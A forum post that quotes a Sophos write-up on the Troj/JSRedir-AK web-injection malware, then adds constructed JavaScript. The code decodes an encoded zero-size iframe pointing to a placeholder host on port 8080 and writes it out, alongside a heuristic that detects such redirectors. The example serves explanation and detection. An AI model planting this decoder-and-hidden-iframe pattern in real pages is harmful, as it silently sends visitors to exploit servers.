FYI...
40% of a month’s malware - Troj/JSRedir-AK
- http://www.sophos.com/blogs/sophoslabs/v/post/8338
January 25, 2010 - "It has been a month since we added detection for Troj/JSRedir-AK* and figures generated today show that over 40% of all web-based detections have been from this malicious code. Translating the numbers into a more human comprehensible form: 1 site every 15 secs was being detected as Troj/JSRedir-AK. The affected sites include well-known names, including:
• Energy Companies
• Retail Companies
• Automobile Club
• Hotels
...Using the JavaScript .replace, the malware deobfuscates itself and dynamically writes an iframe pointing to a Russian website on port 8080 which serves up scripts detected as Troj/Iframe-DL. This new script will write an iframe that will attempt to load a PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG (detected as Exp/VidCtl-A). These then will install various other malware. Troj/JSRedir-AK is a continuation of the Gumblar gang’s exploits using Russian domains instead of Chinese ones... very similar to the one we saw for Troj/JSRedir-R and the infection mechanisms seem to be the same (i.e. FTP credentials)."
(Interesting graph available at the URL above.)
* http://www.sophos.com/security/analy...jsredirak.html
"More Info... Troj/JSRedir-AK will redirect the web browser to other malicious websites."
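Added illustration of the mechanism the Sophos write-up describes (a script that deobfuscates itself with a String.prototype.replace callback, then document.write()s a hidden iframe to a host on port 8080), plus a small check that flags that outcome. This is constructed example code, not Sophos's sample and not the real injected script; the host name "redirector.invalid", the path, and the "#charcode" encoding are assumptions chosen for the demo. It runs under Node, with a stub standing in for document.write.

```javascript
// Constructed "obfuscated" payload: the markup is stored as a run of
// "#<charcode>" tokens, the kind of encoding a replace() callback undoes
// in a single pass. Host and path are placeholders, not the real target.
const HIDDEN_MARKUP =
  '<iframe src="http://redirector.invalid:8080/in.cgi" width="0" height="0"></iframe>';
const OBFUSCATED = HIDDEN_MARKUP.split("")
  .map((c) => "#" + c.charCodeAt(0))
  .join("");

// The decoder idiom: replace() with a callback rebuilds the hidden string,
// which the script then hands straight to document.write.
function deobfuscate(encoded) {
  return encoded.replace(/#(\d+)/g, (_m, code) =>
    String.fromCharCode(Number(code))
  );
}

// Pull every iframe out of a piece of markup and report host, port and
// whether it is sized to be invisible. A missing port resolves to the
// scheme default; relative src values resolve against a dummy page URL.
function iframeTargets(markup) {
  const targets = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const attrs = m[1];
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (!src) continue;
    let u;
    try {
      u = new URL(src[1], "http://page.invalid/");
    } catch (_e) {
      continue; // unparsable src: nothing to report for this tag
    }
    const port = u.port || (u.protocol === "https:" ? "443" : "80");
    const hidden = /\b(width|height)\s*=\s*["']?0\b/i.test(attrs);
    targets.push({ host: u.hostname, port, hidden });
  }
  return targets;
}

// Heuristic over the *decoded* markup: a zero-size iframe to a
// non-standard port. Either trait alone is common on benign pages; the
// pair matches the behaviour described for this family.
function looksLikeRedirector(decodedMarkup) {
  return iframeTargets(decodedMarkup).some(
    (t) => t.hidden && t.port !== "80" && t.port !== "443"
  );
}

// Stand-in for document.write so the flow runs outside a browser.
const written = [];
function documentWriteStub(html) {
  written.push(html);
}

// Simulated execution: decode, "write" the iframe, then inspect what was
// written. A scanner that only greps the raw script would see neither the
// iframe nor the port; it has to look at the decoded output.
documentWriteStub(deobfuscate(OBFUSCATED));
```

The point of checking the decoded output rather than the script text is the one the write-up makes: the iframe and the :8080 host only exist after the .replace pass has run, so a static signature on the raw script has to key on the decoder idiom itself, while a dynamic or emulated pass can key on the resulting markup.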